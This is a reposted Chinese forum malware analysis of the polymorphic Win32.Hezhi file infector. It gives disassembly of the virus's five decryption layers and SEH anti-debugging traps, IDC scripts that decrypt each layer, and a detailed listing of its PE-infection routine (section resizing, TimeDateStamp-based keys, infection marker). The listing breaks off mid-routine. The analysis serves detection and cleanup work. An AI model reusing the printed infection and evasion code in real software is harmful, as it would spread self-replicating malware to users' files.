[转载]Hezhi病毒详细分析(页 1) - 专题安全方向{ Security Research Papers } - 反病毒[ Antivirus ] - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

sunwear 2005-12-15 21:59

[转载]Hezhi病毒详细分析

信息来源：[url]http://www.hhack.com/[/url]
文章作者：haiwei/CVC.GB

Hezhi病毒是去年分析一个病毒,下面是分析报告,由于xxx原因杀毒程序不能公布(其实分析报告应该写得比较清楚了,哈)

写杀变形病毒的程序, 首先是要解决怎么查这个病毒(把病毒的变形引擎分析透彻一点,它怎么变你就怎么查),然后才是杀(好像是废话:))

                     hezhi病毒分析报告

                                    haiwei/CVC.GB
关键字:
变形\病毒\感染\AntiDebug

分析工具:
OD(动态)\IDA(静态)

分析目标:
1.样本MD5值:a7be1177766cec09d7e914ea7985c723
2.病毒名称:Win32.Hezhi
难度:中

病毒简介:
1.这是一个基于poly技术的病毒,病毒代码经过五层加密,且key为动态的.
2.感染在宿主程序的节空隙,如果没有足够的空隙,则增加最后一节的节大小.
3.加密原宿主代码.
4.病毒代码中有多处SEH陷井来反动态调试

病毒执行流程:

1.第一次解密

004087D3 0F 84 87 EF FF FF             jz near ptr loc_40775F+1
.text:004087D9 50                         push eax
.text:004087DA E8 00 00 00 00                call $+5
.text:004087DF 58                         pop eax
.text:004087E0 58                         pop eax
.text:004087E1 BE 00 00 09 02                mov esi, 2090000h \\关键
.text:004087E6 50                         push eax
.text:004087E7 13 C3                      adc eax, ebx
.text:004087E9 1B C3                      sbb eax, ebx
.text:004087EB 58                         pop eax
.text:004087EC B8 0C 03 00 00                mov eax, 30Ch
.text:004087F1 57                         push edi
.text:004087F2 F7 D7                      not edi
.text:004087F4 0F 03 F8                   lsl edi, eax
.text:004087F7 5F                         pop edi
.text:004087F8 81 C0 3A 2E 00 00             add eax, 2E3Ah
.text:004087FE 57                         push edi
.text:004087FF F7 D7                      not edi
.text:00408801 0F 03 F8                   lsl edi, eax
.text:00408804 5F                         pop edi
.text:00408805 C1 C6 1D                   rol esi, 1Dh \\经过这条指令Esi为待解密代码的
                                                \\起始地址
.text:00408808 51                         push ecx
.text:00408809 81 C1 19 39 D0 DB             add ecx, 0DBD03919h
.text:0040880F 59                         pop ecx
.text:00408810
.text:00408810                loc_408810:                   ; CODE XREF: start+D0j
.text:00408810 81 34 30 DA 0C 03 D2             xor dword ptr [eax+esi], 0D2030CDAh  \\Key
.text:00408817 F5                         cmc
.text:00408818 F5                         cmc
.text:00408819 90                         nop
.text:0040881A 90                         nop
.text:0040881B 48                         dec eax
.text:0040881C 50                         push eax
.text:0040881D E8 00 00 00 00                call $+5
.text:00408822 58                         pop eax
.text:00408823 58                         pop eax
.text:00408824 7D EA                      jge short loc_408810  \\循环
.text:00408826 57                         push edi
.text:00408827 F7 D7                      not edi
.text:00408829 0F 03 F8                   lsl edi, eax
.text:0040882C 5F                         pop edi
.text:0040882D FF E6                      jmp esi \\跳到已解密代码执行

下面为小弟写的IDC解密脚本:

   auto RegEsi;
auto Key;
auto RegEax;

RegEsi=0x412000;
Key=0xd2030cda;
RegEax=0x3146;
for (;RegEax>=0;RegEax--)
{
Data=Dword(RegEax+RegEsi)^Key;
      PatchDword(RegEax+RegEsi,Data);

  }
在OD里可以把代码直接拉到JMP XX处 F4(XX可变),在这个例子样本中为JMP Esi

2.第二次解密
JMP Esi来到412000,该处代码如下

00412002  50       PUSH EAX
00412003  E8 00000000 CALL CLSPACK1.00412008
00412008  58       POP EAX
00412009  83C0 1A    ADD EAX,1A
0041200C  50       PUSH EAX                               ; CLSPACK1.00412022
0041200D  64:67:FF36 0000  PUSH DWORD PTR FS:[0] \\这里很明显是一个SEH陷井
00412013  64:67:8926 0000  MOV DWORD PTR FS:[0],ESP
00412019  B8 FFFFFFFF MOV EAX,-1
0041201E  FFE0       JMP EAX             \\故意产生异常
00412020  FFE0       JMP EAX
00412022  64:67:A1 0000 MOV EAX,DWORD PTR FS:[0] \\在这个位置F2下断点,F9,出现异常
                                    \\出现异常后按shift+F9到412022断点处停下
00412027  8B20       MOV ESP,DWORD PTR DS:[EAX]
00412029  64:67:8F06 0000  POP DWORD PTR FS:[0]
0041202F  58       POP EAX             \\这几条指令在恢复SEH
00412030  58       POP EAX
00412031  60       PUSHAD
00412032  E8 00000000 CALL CLSPACK1.00412037
00412037  58       POP EAX
00412038  BE 82104000 MOV ESI,CLSPACK1.00401082
0041203D  BB 37104000 MOV EBX,CLSPACK1.00401037
00412042  2BF3       SUB ESI,EBX
00412044  03F0       ADD ESI,EAX             \\Esi为解密起始地址
00412046  BB C4300000 MOV EBX,30C4             \\解密长度
0041204B  81341E 30C87B80  XOR DWORD PTR DS:[ESI+EBX],807BC830  \\Key
00412052  9C       PUSHFD
      省略若干垃圾指令
0041207D  9D       POPFD
0041207E  4B       DEC EBX
0041207F  ^7D CA       JGE SHORT CLSPACK1.0041204B \\循环
00412081  61       POPAD                \\在OD中把光标停在这F4
下面是第二次解密IDC脚本:
auto RegEsi;
auto Key;
auto RegEax;
auto Data;

RegEsi=0x412082;
Key=0x807bc830;
RegEax=0x30c4;
for (;RegEax>=0;RegEax--)
{
Data=Dword(RegEax+RegEsi)^Key;
PatchDword(RegEax+RegEsi,Data);
}

3.第三次解密

00412089  BE CC104000 MOV ESI,<&KERNEL32.RtlUnwind>
0041208E  BB 88104000 MOV EBX,<&KERNEL32.ExitProcess>
00412093  2BF3       SUB ESI,EBX
00412095  03F0       ADD ESI,EAX          \\解密起始地址
00412097  B9 1F0C0000 MOV ECX,0C1F          \\长度
0041209C  8B06       MOV EAX,DWORD PTR DS:[ESI]
0041209E  F7D0       NOT EAX             \\解密
004120A0  8906       MOV DWORD PTR DS:[ESI],EAX
004120A2  83C6 04    ADD ESI,4
      省略若干垃圾代码
004120C9  ^E2 D1       LOOPD SHORT CLSPACK1.0041209C
004120CB  61       POPAD             \\光标停在这,F4

下面是第三次解密的IDC脚本:
auto RegEsi;
auto RegEax;
auto i;
auto Data;
RegEsi=0x4120cc;
RegEax=0xc1f;
for (i=0;i<RegEax;i=i+4)
{
Data=~Dword(i+RegEsi);
PatchDword(i+RegEsi,Data);

}

4.第四解密

004120D8  64:67:FF36 0000  PUSH DWORD PTR FS:[0]
004120DE  64:67:8926 0000  MOV DWORD PTR FS:[0],ESP  \\又是一个SEH陷井
004120E4  B0 88       MOV AL,88
004120E6  02C0       ADD AL,AL
004120E8  CE       INTO             \\产生异常
004120E9  FFE0       JMP EAX
004120EB  64:67:A1 0000 MOV EAX,DWORD PTR FS:[0]
004120F0  8B20       MOV ESP,DWORD PTR DS:[EAX]
004120F2  64:67:8F06 0000  POP DWORD PTR FS:[0]
004120F8  58       POP EAX
004120F9  58       POP EAX
004120FA  E8 00000000 CALL CLSPACK1.004120FF
004120FF  58       POP EAX
00412100  BE 1F114000 MOV ESI,CLSPACK1.0040111F
00412105  BB FF104000 MOV EBX,CLSPACK1.004010FF
0041210A  2BF3       SUB ESI,EBX
0041210C  03F0       ADD ESI,EAX             \\解密起始地址
0041210E  B9 0A0C0000 MOV ECX,0C0A             \\长度
00412113  8106 B2C430E1 ADD DWORD PTR DS:[ESI],E130C4B2  \\Key
00412119  83C6 04    ADD ESI,4
0041211C  ^E2 F5       LOOPD SHORT CLSPACK1.00412113
0041211E  61       POPAD                \\这里F2下断点,F9,Shift+F9 停在这
下面是第四次解密的IDC脚本:
auto RegEsi;
auto Key;
auto RegEax;
auto i;
auto Data;
RegEsi=0x41211f;
Key=0xe130c4b2;
RegEax=0xc0a;
for (i=0;i<RegEax;i=i+4)
{
Data=Dword(i+RegEsi)+Key;
PatchDword(i+RegEsi,Data);

}


   5.第五次解密

00412126  58       POP EAX
00412127  83C0 1B    ADD EAX,1B
0041212A  50       PUSH EAX
0041212B  64:67:FF36 0000  PUSH DWORD PTR FS:[0] \\SEH陷井
00412131  64:67:8926 0000  MOV DWORD PTR FS:[0],ESP
00412137  B8 FFFFFFFF MOV EAX,-1
0041213C  C600 CC    MOV BYTE PTR DS:[EAX],0CC  \\产生异常
0041213F  FFE0       JMP EAX
00412141  64:67:A1 0000 MOV EAX,DWORD PTR FS:[0]
00412146  8B20       MOV ESP,DWORD PTR DS:[EAX]
00412148  64:67:8F06 0000  POP DWORD PTR FS:[0]    \\恢复SEH
0041214E  58       POP EAX
0041214F  58       POP EAX
00412150  E8 00000000 CALL CLSPACK1.00412155
00412155  58       POP EAX
00412156  BE 76114000 MOV ESI,CLSPACK1.00401176
0041215B  BB 55114000 MOV EBX,CLSPACK1.00401155
00412160  2BF3       SUB ESI,EBX
00412162  03F0       ADD ESI,EAX          \\解密起始地址
00412164  B9 F50B0000 MOV ECX,0BF5          \\长度
00412169  8B06       MOV EAX,DWORD PTR DS:[ESI]  \\
0041216B  C1C0 10    ROL EAX,10          \\解密
0041216E  8906       MOV DWORD PTR DS:[ESI],EAX
00412170  83C6 04    ADD ESI,4
00412173  ^E2 F4       LOOPD SHORT CLSPACK1.00412169
00412175  61       POPAD                \\这里F2下断点,F9,Shift+F9 停在这

下面是第五次解密的IDC脚本:

auto RegEsi;
auto RegEax;
auto i;
auto Data,Temp1,Temp2;
RegEsi=0x412176;

RegEax=0xbf5;
for (i=0;i<RegEax;i=i+4)
{
Temp1=Dword(i+RegEsi);
Temp1=Temp1<<0x10;
Temp1=Temp1&0xffff0000;
Temp2=Dword(i+RegEsi);
Temp2=Temp2>>0x10;
Temp2=Temp2&0xffff;
Data=Temp1|Temp2;
PatchDword(i+RegEsi,Data);

}

6.在当前进程堆中分配8000H字节空间,并把病毒代码复制过去,并跳到堆中执行

004122B4  50       PUSH EAX
004122B5  52       PUSH EDX
004122B6  68 00800000 PUSH 8000
004122BB  6A 09       PUSH 9
004122BD  53       PUSH EBX
004122BE  FFD1       CALL ECX       \\RtlAllocateHeap
                              \\在进程堆中分配8000H字节空间
004122C0  8BC8       MOV ECX,EAX
004122C2  0BC0       OR EAX,EAX
004122C4  5A       POP EDX
004122C5  58       POP EAX
004122C6  0F84 EA2D0000 JE CLSPACK1.004150B6
004122CC  50       PUSH EAX
004122CD  51       PUSH ECX
004122CE  51       PUSH ECX
004122CF  6A 09       PUSH 9
004122D1  53       PUSH EBX
004122D2  FFD2       CALL EDX
004122D4  3D 00800000 CMP EAX,8000
004122D9  0F85 D72D0000 JNZ CLSPACK1.004150B6
004122DF  59       POP ECX
004122E0  58       POP EAX
004122E1  57       PUSH EDI
004122E2  50       PUSH EAX
004122E3  8BF9       MOV EDI,ECX
004122E5  57       PUSH EDI
004122E6  B8 FC124000 MOV EAX,CLSPACK1.004012FC                   ; ASCII "runtime error "
004122EB  2D 00104000 SUB EAX,<&ADVAPI32.RegSetValueExA>
004122F0  03C7       ADD EAX,EDI
004122F2  B9 4A310000 MOV ECX,314A                   \\需复制代码的长度
004122F7  FC       CLD
004122F8  F3:A4       REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] \\复制
004122FA  FFE0       JMP EAX                         \\跳到堆中执行

7.判断当前系统中是否有一个名为"DELPHI"的事件,如果存在则转12 否则转8
则解密原宿主程序代码.

001364D0  68 04010000 PUSH 104
001364D5  8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]
001364DB  50       PUSH EAX
001364DC  6A 00       PUSH 0
001364DE  FF97 912A0000 CALL DWORD PTR DS:[EDI+2A91]
001364E4  8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]
001364EA  50       PUSH EAX
001364EB  6A 01       PUSH 1
001364ED  68 03001F00 PUSH 1F0003
001364F2  FF97 952A0000 CALL DWORD PTR DS:[EDI+2A95] \\OpenEvent
001364F8  8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX
001364FE  83F8 00    CMP EAX,0
00136501  74 0C       JE SHORT 0013650F       \\如果当前没有DELPHI事件则跳
                                    \\这个跳转非常关键
   \\它决定是走病毒流程还是原宿主程序的流程
00136503  50       PUSH EAX
00136504  FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79]
0013650A  E9 AF2B0000 JMP 001390BE
0013650F  8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]
00136515  50       PUSH EAX
00136516  6A 01       PUSH 1
00136518  6A 00       PUSH 0
0013651A  6A 00       PUSH 0
0013651C  FF97 992A0000 CALL DWORD PTR DS:[EDI+2A99] \\CreateEvent 创建一个名为"DELPHI"的事件
00136522  8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX
00136528  57       PUSH EDI
00136529  8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]
0013652F  50       PUSH EAX
00136530  FF97 ED2A0000 CALL DWORD PTR DS:[EDI+2AED]
00136536  5F       POP EDI
00136537  8D87 60290000 LEA EAX,DWORD PTR DS:[EDI+2960]
0013653D  50       PUSH EAX
0013653E  8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]
00136544  50       PUSH EAX
00136545  6A 00       PUSH 0
00136547  6A 00       PUSH 0
00136549  6A 20       PUSH 20
0013654B  6A 00       PUSH 0
0013654D  6A 00       PUSH 0
0013654F  6A 00       PUSH 0
00136551  FF97 CD2A0000 CALL DWORD PTR DS:[EDI+2ACD]  \\\\GetCommandLine
00136557  50       PUSH EAX
00136558  8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]
0013655E  50       PUSH EAX
0013655F  FF97 852A0000 CALL DWORD PTR DS:[EDI+2A85]  \\CreateProcess 自身全路径名
00136565  E8 00000000 CALL 0013656A
0013656A  58       POP EAX
0013656B  60       PUSHAD
0013656C  8D88 32000000 LEA ECX,DWORD PTR DS:[EAX+32]  \\这是一个变相的SEH安装
00136572  51       PUSH ECX
00136573  66:8CDA    MOV DX,DS
00136576  0FA0       PUSH FS
00136578  1F       POP DS
00136579  BB 00000000 MOV EBX,0
0013657E  FF33       PUSH DWORD PTR DS:[EBX]
00136580  8BEC       MOV EBP,ESP
00136582  892B       MOV DWORD PTR DS:[EBX],EBP
00136584  66:8EDA    MOV DS,DX
00136587  57       PUSH EDI
00136588  FF97 E52A0000 CALL DWORD PTR DS:[EDI+2AE5]
0013658E  5F       POP EDI
0013658F  57       PUSH EDI
00136590  6A 01       PUSH 1
00136592  50       PUSH EAX
00136593  FF97 E92A0000 CALL DWORD PTR DS:[EDI+2AE9]  \\这里会产生异常
00136599  5F       POP EDI
0013659A  EB 0F       JMP SHORT 001365AB
0013659C  33DB       XOR EBX,EBX             \\这里F2下断点,F9,shift+F9
0013659E  66:8CDA    MOV DX,DS
001365A1  0FA0       PUSH FS
001365A3  1F       POP DS
001365A4  8B03       MOV EAX,DWORD PTR DS:[EBX]
001365A6  66:8EDA    MOV DS,DX
001365A9  8B20       MOV ESP,DWORD PTR DS:[EAX]
001365AB  33DB       XOR EBX,EBX
001365AD  66:8CDA    MOV DX,DS

8.枚举局域网共享资源,并感染之

9.查找C-Z的固定磁盘,
   a.其中包含:RUNDLL32\RUNONCE\RAV\LSASS\SERVICES\WINLOGON\SPOOLSV
      MSTASK\RPCSS\AVCONSOL字符串的文件不感染.
   b.小于8K的文件不感染.
  c.系统目录下的文件不感染.

10当找到一个EXE文件时,首先判断是否是合法的PE文件,然生判断是否是已经感染文件
   (以PE文件结构中的TimeDateStamp+1处的两个字节是否等于C354H来判断),如果
   等于则继续下一个文件.否则转11

11.具体的感染过程如下:(由于是在最后一次解密后DUMP出来的,所以地址跟OD中的不一样
   但指令和代码功能是一样的)
  另:加密病毒代码和原宿主程序代码的Key由原宿主程序TimeDateStamp算得

00412A60  66:837E 5C 02 CMP WORD PTR DS:[ESI+5C],2 \\WINDOWS系统
00412A65  0F85 7F040000 JNZ CLSPACK.00412EEA
00412A6B  8B46 08    MOV EAX,DWORD PTR DS:[ESI+8]  \\TimeDateStamp
00412A6E  83F8 00    CMP EAX,0
00412A71  75 21       JNZ SHORT CLSPACK.00412A94 \\在TimeDataStamp不为0的情况下用它用密钥,否则用E4C3542D为密钥
00412A73  B8 2D54C3E4 MOV EAX,E4C3542D          \\密钥呀  E4C3542D
00412A78  C787 7F100000 CA>MOV DWORD PTR DS:[EDI+107F],2ACA
00412A82  C787 85100000 7C>MOV DWORD PTR DS:[EDI+1085],67C
00412A8C  8946 08    MOV DWORD PTR DS:[ESI+8],EAX
00412A8F  E9 C3000000 JMP CLSPACK.00412B57
00412A94  8987 AA300000 MOV DWORD PTR DS:[EDI+30AA],EAX  \\下面这段关键呀

00412A9A  50       PUSH EAX
00412A9B  53       PUSH EBX
00412A9C  35 DF6A45D3 XOR EAX,D3456ADF          \\D3456ADF
00412AA1  8987 4A100000 MOV DWORD PTR DS:[EDI+104A],EAX
00412AA7  BB FFFAFFFF MOV EBX,-501
00412AAC  2BD8       SUB EBX,EAX
00412AAE  899F 50100000 MOV DWORD PTR DS:[EDI+1050],EBX
00412AB4  5B       POP EBX
00412AB5  58       POP EAX
00412AB6  53       PUSH EBX
00412AB7  51       PUSH ECX
00412AB8  E8 FB060000 CALL CLSPACK.004131B8 \\\(TimeDateStamp*0x7FFFFFFF+1)%-5=EAX
                                 其中TimeDataStamp为EAX
00412ABD  8BD8       MOV EBX,EAX
00412ABF  C1EB 08    SHR EBX,8
00412AC2  50       PUSH EAX
00412AC3  53       PUSH EBX
00412AC4  51       PUSH ECX
00412AC5  52       PUSH EDX
00412AC6  8BC3       MOV EAX,EBX
00412AC8  8BCB       MOV ECX,EBX
00412ACA  25 FF000000 AND EAX,0FF
00412ACF  50       PUSH EAX             \\这段代码应该是变形引擎的随机数选择段
00412AD0  C1E8 04    SHR EAX,4
00412AD3  24 07       AND AL,7
00412AD5  3C 05       CMP AL,5
00412AD7  76 02       JBE SHORT CLSPACK.00412ADB
00412AD9  2C 02       SUB AL,2
00412ADB  8AD8       MOV BL,AL
00412ADD  58       POP EAX
00412ADE  24 07       AND AL,7
00412AE0  3C 05       CMP AL,5
00412AE2  76 02       JBE SHORT CLSPACK.00412AE6
00412AE4  2C 04       SUB AL,4
00412AE6  38D8       CMP AL,BL
00412AE8  75 34       JNZ SHORT CLSPACK.00412B1E
00412AEA  8BD9    &nb, sp;  MOV EBX,ECX
00412AEC  C1EB 08    SHR EBX,8
00412AEF  8BC3       MOV EAX,EBX
00412AF1  25 FF000000 AND EAX,0FF
00412AF6  50       PUSH EAX
00412AF7  C1E8 04    SHR EAX,4
00412AFA  24 07       AND AL,7
00412AFC  3C 05       CMP AL,5
00412AFE  76 02       JBE SHORT CLSPACK.00412B02
00412B00  2C 02       SUB AL,2
00412B02  8AD8       MOV BL,AL
00412B04  58       POP EAX
00412B05  24 07       AND AL,7
00412B07  3C 05       CMP AL,5
00412B09  76 02       JBE SHORT CLSPACK.00412B0D
00412B0B  2C 04       SUB AL,4
00412B0D  38D8       CMP AL,BL
00412B0F  75 0D       JNZ SHORT CLSPACK.00412B1E
00412B11  3C 05       CMP AL,5
00412B13  74 04       JE SHORT CLSPACK.00412B19
00412B15  FEC3       INC BL
00412B17  EB 05       JMP SHORT CLSPACK.00412B1E
00412B19  80E2 03    AND DL,3
00412B1C  8ADA       MOV BL,DL
00412B1E  83E0 07    AND EAX,7
00412B21  83E3 07    AND EBX,7
00412B24  83E1 07    AND ECX,7
00412B27  E8 6C050000 CALL CLSPACK.00413098 \\这个CALL根椐上面产生的随机数产生随机代码,(里面包含一张表)
00412B2C  5A       POP EDX
00412B2D  59       POP ECX
00412B2E  5B       POP EBX
00412B2F  58       POP EAX
00412B30  81E3 FF0F0000 AND EBX,0FFF
00412B36  899F 7F100000 MOV DWORD PTR DS:[EDI+107F],EBX
00412B3C  B9 46310000 MOV ECX,3146
00412B41  2BCB       SUB ECX,EBX
00412B43  898F 85100000 MOV DWORD PTR DS:[EDI+1085],ECX
00412B49  59       POP ECX
00412B4A  5B       POP EBX
00412B4B  8987 8F100000 MOV DWORD PTR DS:[EDI+108F],EAX
00412B51  66:C746 09 54C3  MOV WORD PTR DS:[ESI+9],0C354 \\写入感染标志,这个位置为PE文件的TimeDateStamp处
00412B57  8B46 28    MOV EAX,DWORD PTR DS:[ESI+28] \\原AddressOfEntryPoint
00412B5A  8987 5F060000 MOV DWORD PTR DS:[EDI+65F],EAX \\呵呵,在解密后的病毒+65F处可以看见
                                       可爱的入口地址
00412B60  8B46 38    MOV EAX,DWORD PTR DS:[ESI+38] \\SectionAlignment
00412B63  8987 942E0000 MOV DWORD PTR DS:[EDI+2E94],EAX
00412B69  8B46 34    MOV EAX,DWORD PTR DS:[ESI+34] \\ImageBase
00412B6C  8987 B2300000 MOV DWORD PTR DS:[EDI+30B2],EAX
00412B72  8D5E 18    LEA EBX,DWORD PTR DS:[ESI+18] \\Magic
00412B75  33D2       XOR EDX,EDX
00412B77  66:8B56 14    MOV DX,WORD PTR DS:[ESI+14]    \\SizeOfOptionHeader
00412B7B  03DA       ADD EBX,EDX             \\EBX->第一个节表
00412B7D  33C9       XOR ECX,ECX
00412B7F  66:8B4E 06    MOV CX,WORD PTR DS:[ESI+6]    \\NumberOfSections
00412B83  8B46 28    MOV EAX,DWORD PTR DS:[ESI+28] \\AddressofEntryPoint
00412B86  8B53 0C    MOV EDX,DWORD PTR DS:[EBX+C]    \\VirtualAddress
00412B89  3BC2       CMP EAX,EDX
00412B8B  72 07       JB SHORT CLSPACK.00412B94    \\如果AddressOfEntryPoint<VirtualAddress则转下一个节
00412B8D  0353 08    ADD EDX,DWORD PTR DS:[EBX+8]    \\VirtualSize
00412B90  3BC2       CMP EAX,EDX
00412B92  76 18       JBE SHORT CLSPACK.00412BAC    \\如果入口点在当前节中则跳
00412B94  83C3 28    ADD EBX,28
00412B97  ^E2 EA       LOOPD SHORT CLSPACK.00412B83
00412B99  80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412BA0  74 05       JE SHORT CLSPACK.00412BA7
00412BA2  E9 43030000 JMP CLSPACK.00412EEA
00412BA7  E9 F5190000 JMP CLSPACK.004145A1
00412BAC  50       PUSH EAX
00412BAD  52       PUSH EDX
00412BAE  05 00020000 ADD EAX,200
00412BB3  8B53 0C    MOV EDX,DWORD PTR DS:[EBX+C] \\VirtualAddress
00412BB6  0353 10    ADD EDX,DWORD PTR DS:[EBX+10]  \\SizeOfRawData
00412BB9  3BC2       CMP EAX,EDX
00412BBB  5A       POP EDX
00412BBC  58       POP EAX
00412BBD  77 24       JA SHORT CLSPACK.00412BE3
00412BBF  50       PUSH EAX
00412BC0  0346 34    ADD EAX,DWORD PTR DS:[ESI+34]  \\ImageBase
00412BC3  8987 18060000 MOV DWORD PTR DS:[EDI+618],EAX  \\ImageBase+AddressOfEntryPoint
00412BC9  8B43 24    MOV EAX,DWORD PTR DS:[EBX+24]  \\Characteristics
00412BCC  0D 00000020 OR EAX,20000000          \\IMAGE_SCN_MEM_EXECUTE
00412BD1  8943 24    MOV DWORD PTR DS:[EBX+24],EAX \\写回
00412BD4  58       POP EAX                \\AddressOfEntryPoint
00412BD5  2B43 0C    SUB EAX,DWORD PTR DS:[EBX+C] \\EAX-VirtualAddress
00412BD8  0343 14    ADD EAX,DWORD PTR DS:[EBX+14] \\PointerToRawData
00412BDB  8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX \\EAX->FileOffset
00412BE1  EB 2F       JMP SHORT CLSPACK.00412C12
00412BE3  50       PUSH EAX
00412BE4  52       PUSH EDX
00412BE5  8B53 0C    MOV EDX,DWORD PTR DS:[EBX+C]
00412BE8  8956 28    MOV DWORD PTR DS:[ESI+28],EDX
00412BEB  0356 34    ADD EDX,DWORD PTR DS:[ESI+34]
00412BEE  8997 18060000 MOV DWORD PTR DS:[EDI+618],EDX
00412BF4  8B43 24    MOV EAX,DWORD PTR DS:[EBX+24]
00412BF7  0D 00000020 OR EAX,20000000
00412BFC  8943 24    MOV DWORD PTR DS:[EBX+24],EAX
00412BFF  5A       POP EDX
00412C00  58       POP EAX
00412C01  8B43 14    MOV EAX,DWORD PTR DS:[EBX+14]
00412C04  8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX
00412C0A  8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX
00412C10  EB 79       JMP SHORT CLSPACK.00412C8B
00412C12  8D5E 18    LEA EBX,DWORD PTR DS:[ESI+18]  \\ESI->*PE*
00412C15  33D2       XOR EDX,EDX
00412C17  66:8B56 14    MOV DX,WORD PTR DS:[ESI+14]
00412C1B  03DA       ADD EBX,EDX             \\EBX->.text
00412C1D  33C9       XOR ECX,ECX
00412C1F  66:8B4E 06    MOV CX,WORD PTR DS:[ESI+6]    \\NumberOfSections
00412C23  8B43 10    MOV EAX,DWORD PTR DS:[EBX+10] \\SizeOfRawData
00412C26  2B43 08    SUB EAX,DWORD PTR DS:[EBX+8] \\VirtualSize
00412C29  3B87 AE300000 CMP EAX,DWORD PTR DS:[EDI+30AE] \\CMP EAX,200
00412C2F  7D 37       JGE SHORT CLSPACK.00412C68
00412C31  8B46 28    MOV EAX,DWORD PTR DS:[ESI+28]
00412C34  8B53 0C    MOV EDX,DWORD PTR DS:[EBX+C]
00412C37  3BC2       CMP EAX,EDX
00412C39  72 07       JB SHORT CLSPACK.00412C42
00412C3B  0353 08    ADD EDX,DWORD PTR DS:[EBX+8]
00412C3E  3BC2       CMP EAX,EDX
00412C40  76 18       JBE SHORT CLSPACK.00412C5A
00412C42  83C3 28    ADD EBX,28
00412C45  ^E2 DC       LOOPD SHORT CLSPACK.00412C23
00412C47  80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412C4E  74 05       JE SHORT CLSPACK.00412C55
00412C50  E9 95020000 JMP CLSPACK.00412EEA
00412C55  E9 47190000 JMP CLSPACK.004145A1
00412C5A  2B43 0C    SUB EAX,DWORD PTR DS:[EBX+C]
00412C5D  0343 14    ADD EAX,DWORD PTR DS:[EBX+14]
00412C60  8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX //EPOFileOffset
00412C66  EB 23       JMP SHORT CLSPACK.00412C8B
00412C68  8B43 14    MOV EAX,DWORD PTR DS:[EBX+14]
00412C6B  0343 08    ADD EAX,DWORD PTR DS:[EBX+8]
00412C6E  8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX
00412C74  8B43 0C    MOV EAX,DWORD PTR DS:[EBX+C]
00412C77  0343 08    ADD EAX,DWORD PTR DS:[EBX+8]
00412C7A  8946 28    MOV DWORD PTR DS:[ESI+28],EAX
00412C7D  50       PUSH EAX
00412C7E  8B43 08    MOV EAX,DWORD PTR DS:[EBX+8]
00412C81  0387 AE300000 ADD EAX,DWORD PTR DS:[EDI+30AE]
00412C87  8943 08    MOV DWORD PTR DS:[EBX+8],EAX
00412C8A  58       POP EAX
00412C8B  83C3 28    ADD EBX,28
00412C8E  ^E2 FB       LOOPD SHORT CLSPACK.00412C8B \\定位到最后一个节上
00412C90  83EB 28    SUB EBX,28
00412C93  C743 24 400000C0 MOV DWORD PTR DS:[EBX+24],C0000040  \\改节属性
00412C9A  8B43 10    MOV EAX,DWORD PTR DS:[EBX+10]    \\SizeOfRawData
00412C9D  50       PUSH EAX
00412C9E  0343 0C    ADD EAX,DWORD PTR DS:[EBX+C]    \\VirtualAddress
00412CA1  0346 34    ADD EAX,DWORD PTR DS:[ESI+34]    \\Image
00412CA4  51       PUSH ECX
00412CA5  8A4E 08    MOV CL,BYTE PTR DS:[ESI+8]       \\TimeDateStamp
00412CA8  80E1 1F    AND CL,1F
00412CAB  888F 8B100000 MOV BYTE PTR DS:[EDI+108B],CL
00412CB1  D3C8       ROR EAX,CL
00412CB3  59       POP ECX
00412CB4  8987 7A100000 MOV DWORD PTR DS:[EDI+107A],EAX  \\020CA000H
00412CBA  B9 00320000 MOV ECX,3200
00412CBF  014B 10    ADD DWORD PTR DS:[EBX+10],ECX \\把最后一节大小加3200H
00412CC2  014E 20    ADD DWORD PTR DS:[ESI+20],ECX \\SizeOfinitializeData+3200H
00412CC5  8B43 10    MOV EAX,DWORD PTR DS:[EBX+10]
00412CC8  3B43 08    CMP EAX,DWORD PTR DS:[EBX+8]
00412CCB  76 03       JBE SHORT CLSPACK.00412CD0
00412CCD  8943 08    MOV DWORD PTR DS:[EBX+8],EAX
00412CD0  05 FF0F0000 ADD EAX,0FFF
00412CD5  25 00F0FFFF AND EAX,FFFFF000
00412CDA  0343 0C    ADD EAX,DWORD PTR DS:[EBX+C]
00412CDD  8946 50    MOV DWORD PTR DS:[ESI+50],EAX \\SizeOfImage
00412CE0  52       PUSH EDX
00412CE1  8B53 08    MOV EDX,DWORD PTR DS:[EBX+8]
00412CE4  0353 0C    ADD EDX,DWORD PTR DS:[EBX+C]
00412CE7  3BC2       CMP EAX,EDX
00412CE9  73 03       JNB SHORT CLSPACK.00412CEE
00412CEB  8956 50    MOV DWORD PTR DS:[ESI+50],EDX
00412CEE  5A       POP EDX
00412CEF  5A       POP EDX
00412CF0  0353 14    ADD EDX,DWORD PTR DS:[EBX+14]
00412CF3  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88] \\hFile
00412CF9  80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412D00  75 05       JNZ SHORT CLSPACK.00412D07
00412D02  E9 75170000 JMP CLSPACK.0041447C
00412D07  51       PUSH ECX
00412D08  52       PUSH EDX
00412D09  6A 00       PUSH 0
00412D0B  53       PUSH EBX
00412D0C  FF97 B12A0000 CALL DWORD PTR DS:[EDI+2AB1] \\GetFileSize
00412D12  5A       POP EDX
00412D13  59       POP ECX
00412D14  83F8 00    CMP EAX,0
00412D17  0F84 CD010000 JE CLSPACK.00412EEA
00412D1D  8BDA       MOV EBX,EDX
00412D1F  81C3 00020000 ADD EBX,200
00412D25  3BC3       CMP EAX,EBX
